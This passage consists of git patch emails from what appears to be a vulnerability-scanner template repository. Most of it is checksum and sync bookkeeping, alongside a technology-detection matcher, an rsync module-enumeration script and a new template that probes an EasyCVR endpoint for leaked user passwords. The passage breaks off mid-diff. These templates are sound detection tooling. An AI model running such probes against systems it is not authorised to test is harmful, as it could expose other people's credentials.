-http/cves/2024/CVE-2024-24919.yaml:59be299acfb1747ce7401170404292e788d0a822 +http/cves/2024/CVE-2024-24919.yaml:76513c240417ed04c64daf40bfb3ec04d9f2ac28 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d -http/cves/2024/CVE-2024-27348.yaml:b6afd2794a4897d3ea0154168726979ebd947dc6 +http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 @@ -8622,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2b8fbacfb2772cd3809af3bccae99ba38931ed8e +templates-checksum.txt:86d8a8d0c31136a3086c0b3408dc5f9208f8e3f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2823a71e5efc09d3e19cc3682e655be530881e29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 07:13:26 +0000 Subject: [PATCH 644/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9337c8a45f..b333fabf2d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' + - 'http/cves/2024/CVE-2024-27348.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-3822.yaml' From 798fa434f8ccc1ba3aec9c5d61514cc5ab06aa5d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 07:14:38 +0000 Subject: [PATCH 645/847] Auto Template Signing [Tue Jun 4 07:14:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 598f70da74..a92dc09e7c 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a0d1070c7111ef0e84e99df831db36199363b5f5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 4 Jun 2024 10:27:01 +0200 Subject: [PATCH 646/847] Add files via upload --- http/technologies/tech-detect.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 376458562a..66215090c1 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2243,6 +2243,14 @@ http: condition: or part: body + - type: word + name: ibm-websphere-application-server + words: + - '$wsep:' + - '$WSEP:' + condition: or + part: all_headers + - type: regex name: bootstrap regex: From c90632de186a2015707f3186ecc4482f00887da0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 14:43:34 +0530 Subject: [PATCH 647/847] add intrusive tag --- http/cves/2024/CVE-2024-4358.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 32f7e2d3b0..b2e32509c0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 - tags: cve,cve2024,telerik,progress,auth-bypass + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive variables: user: "{{rand_base(6)}}" From 1a09b4866f2ae0142840565515fb3a70b1f286f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:20:07 +0000 Subject: [PATCH 649/847] Auto Generated Templates Checksum [Tue Jun 4 17:20:07 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 02b7421015..aa58b932cd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3279,7 +3279,7 @@ http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff -http/cves/2024/CVE-2024-24919.yaml:76513c240417ed04c64daf40bfb3ec04d9f2ac28 +http/cves/2024/CVE-2024-24919.yaml:32ba8338c24aa5d9b6bc4780c00087a850faabe8 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 @@ -4200,7 +4200,7 @@ http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 -http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 +http/exposed-panels/oracle-business-intelligence.yaml:64437a135a00da2b4507b35088c2fdfd6527e11a http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a @@ -8622,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:86d8a8d0c31136a3086c0b3408dc5f9208f8e3f7 +templates-checksum.txt:eab2daf18d55673ee74262a059774768fe74473f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9595c06ac5fda54b909a592ceaf679e19dc5d945 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 4 Jun 2024 22:50:32 +0530 Subject: [PATCH 650/847] Update cox-business-panel.yaml --- http/exposed-panels/cox-business-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml index dc96a8c3f5..3a0d5192d3 100644 --- a/http/exposed-panels/cox-business-panel.yaml +++ b/http/exposed-panels/cox-business-panel.yaml @@ -1,7 +1,7 @@ id: cox-business-panel info: - name: Cox Business Dominion Gateway Login - Panel + name: Cox Business Dominion Gateway Login Panel - Detect author: DhiyaneshDK severity: info description: | From 0c50e82625e7e727a4d80edd8fcd413a45fbad95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:21:48 +0000 Subject: [PATCH 651/847] Auto Template Signing [Tue Jun 4 17:21:47 UTC 2024] :robot: --- http/exposed-panels/oracle-business-intelligence.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 0abbd2ab1d..5efc63b867 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -41,4 +41,5 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 490a0046304402201ada524d94f69695b6669c32f450046adc94781b54b39fe4d0ad1d262ca58b3e022027fa8cd7e5ab135d2e757ae8e8c27701fa60c3372619d4f0b974c78bc53bb4f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a67ed5d632bd8a7da31d09059b60a57700236123 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:22:29 +0000 Subject: [PATCH 652/847] Auto Generated New Template Addition List [Tue Jun 4 17:22:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd62c442a4..b3c55eab83 100644 --- a/.new-additions +++ b/.new-additions @@ -59,6 +59,7 @@ http/misconfiguration/installer/wowonder-installer.yaml http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml +http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml network/detection/bitvise-ssh-detect.yaml From 21c8efa5b34e4ffc42db28981a05d66f28ede542 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:22:34 +0000 Subject: [PATCH 653/847] Auto Generated Templates Checksum [Tue Jun 4 17:22:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index aa58b932cd..49b6f03be8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4200,7 +4200,7 @@ http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 -http/exposed-panels/oracle-business-intelligence.yaml:64437a135a00da2b4507b35088c2fdfd6527e11a +http/exposed-panels/oracle-business-intelligence.yaml:4f19eda18cffc99d834727c4aa620adeb4a2e486 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a @@ -7715,6 +7715,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e +http/vulnerabilities/other/aquatronica-info-leak.yaml:78987131bb50f9efbdcf8f4c060c696627287557 http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a @@ -8622,7 +8623,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eab2daf18d55673ee74262a059774768fe74473f +templates-checksum.txt:7f1469bfc3e1eca28e5b74a5ebf4935755687a27 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eb7a55f147490bb35469ef9cfb778f793c303d30 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:23:10 +0000 Subject: [PATCH 654/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b333fabf2d..2b85aef4a8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -64,6 +64,7 @@ on: - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' + - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'network/detection/bitvise-ssh-detect.yaml' From baacd03135676b6c45fd4ccbf9ffee978673ded8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:24:15 +0000 Subject: [PATCH 655/847] Auto Generated New Template Addition List [Tue Jun 4 17:24:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b3c55eab83..244353d905 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/cox-business-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/oracle-access-management.yaml From d0dccc286e08312e1e4617bbb942d5077608e8a8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:24:20 +0000 Subject: [PATCH 656/847] Auto Generated Templates Checksum [Tue Jun 4 17:24:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49b6f03be8..92e6563fa3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3729,6 +3729,7 @@ http/exposed-panels/corebos-panel.yaml:f5c97e99526a78856683eab9bead66f41151d5bb http/exposed-panels/cortex-xsoar-login.yaml:73c55686323fbaf56a48c90d96ca1a55295d78f6 http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e39697d http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 +http/exposed-panels/cox-business-panel.yaml:57fc005509d4bf4caa98e0c3a179742bb3d29b09 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 @@ -8623,7 +8624,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f1469bfc3e1eca28e5b74a5ebf4935755687a27 +templates-checksum.txt:4aee2cd5329b91b6d4668bdb739a2bc53ee41b4b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 123bc0d0dd6cf11e2b9eb2aa742bc3bf8fe00c2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:24:22 +0000 Subject: [PATCH 657/847] Auto Template Signing [Tue Jun 4 17:24:22 UTC 2024] :robot: --- http/vulnerabilities/other/aquatronica-info-leak.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/aquatronica-info-leak.yaml b/http/vulnerabilities/other/aquatronica-info-leak.yaml index a589de46cc..d9ce12e678 100644 --- a/http/vulnerabilities/other/aquatronica-info-leak.yaml +++ b/http/vulnerabilities/other/aquatronica-info-leak.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100aadc273e2296921d5b626e81c36425d5e2e06d2ab2bb28dd474b64c2f4fe02150220487e00677d55c5024c3a496b423945c214d9edc0c360d3a0614a8b227e0e17cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c6b7f0ff19fe86dad116ee5176466207b89dd2b7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:25:03 +0000 Subject: [PATCH 658/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2b85aef4a8..6b882fe3ab 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/cox-business-panel.yaml' - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/oracle-access-management.yaml' From 2e8ffd20afde04165ff16d560e44cb963b66d137 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:28:10 +0000 Subject: [PATCH 659/847] Auto Generated New Template Addition List [Tue Jun 4 17:28:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 244353d905..d9ff43ffe7 100644 --- a/.new-additions +++ b/.new-additions @@ -60,6 +60,7 @@ http/misconfiguration/installer/wowonder-installer.yaml http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml +http/technologies/sparklighter-detect.yaml http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From b22084e8b226423392f75bf9285252e3c4b6d639 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:28:17 +0000 Subject: [PATCH 660/847] Auto Generated Templates Checksum [Tue Jun 4 17:28:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92e6563fa3..56e923c90f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7012,6 +7012,7 @@ http/technologies/smtp2go-detect.yaml:6019a0c74e3488774d4f3909ee47c17cf6f5490b http/technologies/snipeit-panel.yaml:aeed56e720ca069ccc5fffae2c3a77a93642c89b http/technologies/sogo-detect.yaml:12c9d0bda8f9ed788ffc1ff04aca07cf08a21646 http/technologies/sonicwall-email-security-detect.yaml:661f432cedd68b0aacd6ef82aaf5fbfcb9c03281 +http/technologies/sparklighter-detect.yaml:afaadfd576d288a6071151c16878d9c1d5587dbf http/technologies/spinnaker-detect.yaml:1e4b0cf0ce948c69e22a6d1022e8065c23a9f072 http/technologies/splash-rendering-service.yaml:31a8465843cc494d2146c66dce532bf6ce4cc2b0 http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 @@ -7716,7 +7717,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e -http/vulnerabilities/other/aquatronica-info-leak.yaml:78987131bb50f9efbdcf8f4c060c696627287557 +http/vulnerabilities/other/aquatronica-info-leak.yaml:6b90129c71b401a56ea780ca90fd695d6d8a4a76 http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a @@ -8624,7 +8625,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4aee2cd5329b91b6d4668bdb739a2bc53ee41b4b +templates-checksum.txt:909b2cd7fb45b7050c8683d35e03e9d35aa6751e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 413a41db3746c66b65b48c1cd2267dc983bb7ba4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:28:56 +0000 Subject: [PATCH 661/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6b882fe3ab..bda9cc89ee 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -65,6 +65,7 @@ on: - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' + - 'http/technologies/sparklighter-detect.yaml' - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 34684c26a184002c78d43d2c4b5127ba63b9c55b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:30:01 +0000 Subject: [PATCH 662/847] Auto Template Signing [Tue Jun 4 17:30:01 UTC 2024] :robot: --- http/exposed-panels/cox-business-panel.yaml | 1 + http/technologies/sparklighter-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml index 3a0d5192d3..442fbaaded 100644 --- a/http/exposed-panels/cox-business-panel.yaml +++ b/http/exposed-panels/cox-business-panel.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202f0783850ff8e6ce5bd1c7ae9410397ff875b5faf3b291ac333da2a618508828022100e296680b28b7dd0221e526c5cf495d4308078f39630e99d450aca0a6ba76eddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 95913d9fe2..6296410e7b 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207385072267045626e21df0372710dba86a13eb83ba4f174534eced87bda3caf902203f7a6980f505827c380f8d3255574a0d02e42637f362cc66340dce59452f5150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fdc1b1fc9e11e788644a1734289b7f4a2c9c7597 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 00:15:52 +0530 Subject: [PATCH 663/847] Update rsync-list-modules.yaml --- .../enumeration/rsync/rsync-list-modules.yaml | 32 +++++++++++-------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index e4a8a069a4..c43f98be8d 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -1,7 +1,7 @@ id: rsync-list-modules info: - name: Rsync List Modules + name: Rsync List Modules - Enumeration author: pussycat0x severity: low description: | @@ -17,22 +17,26 @@ info: javascript: - code: | const c = require("nuclei/net"); - let s = "@RSYNCD: 31.0\n\n" - let conn = c.Open('tcp', `${Host}:${Port}`); - conn.Send(s); - response =(conn.RecvString(1024)) - response; + const data = "@RSYNCD: 31.0\n\n" + const conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(data); + response = conn.RecvFullString(1024) + const rsyncRegex = /@RSYNCD: EXIT|@RSYNCD: 31.0|@RSYNCD:|@RSYNCD: 30.0/g; + const resultString = response.replace(rsyncRegex, ""); + const whitespaceRegex = /[\s\t\n]+/g; + const finalResult = resultString.replace(whitespaceRegex, " "); + if (finalResult.trim() === "") { + exit(); + } + else{ + finalResult + } args: Host: "{{Host}}" Port: 873 - matchers: - - type: word - words: - - "RSYNCD: " - extractors: - - type: regex - regex: - - '(.*)' + - type: dsl + dsl: + - response From 48c2ad816720ca34f1c3e092830e78877059da7b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 09:59:33 +0530 Subject: [PATCH 664/847] Create easycvr-info-leak.yaml --- .../other/easycvr-info-leak.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/other/easycvr-info-leak.yaml diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml new file mode 100644 index 0000000000..1f82da48d7 --- /dev/null +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -0,0 +1,30 @@ +id: easycvr-info-leak +info: + name: EasyCVR video management - Users Information Exposure + author: pussycat0x + severity: high + description: | + EasyCVR video management platform has leaked user information + reference: + - https://github.com/wy876/POC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md + metadata: + verified: true + fofa-query: title="EasyCVR" + tags: unauth,easycvr,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10" + + matchers: + - type: word + words: + - "count" + - "Password" + - "RoleId" + condition: and + + - type: status + status: + - 200 From b1dff1a023f06b2dbe2560167dd3bc9b9aa602b5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 10:24:27 +0530 Subject: [PATCH 665/847] Update easycvr-info-leak.yaml --- .../other/easycvr-info-leak.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 1f82da48d7..a00a473043 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -12,11 +12,28 @@ info: fofa-query: 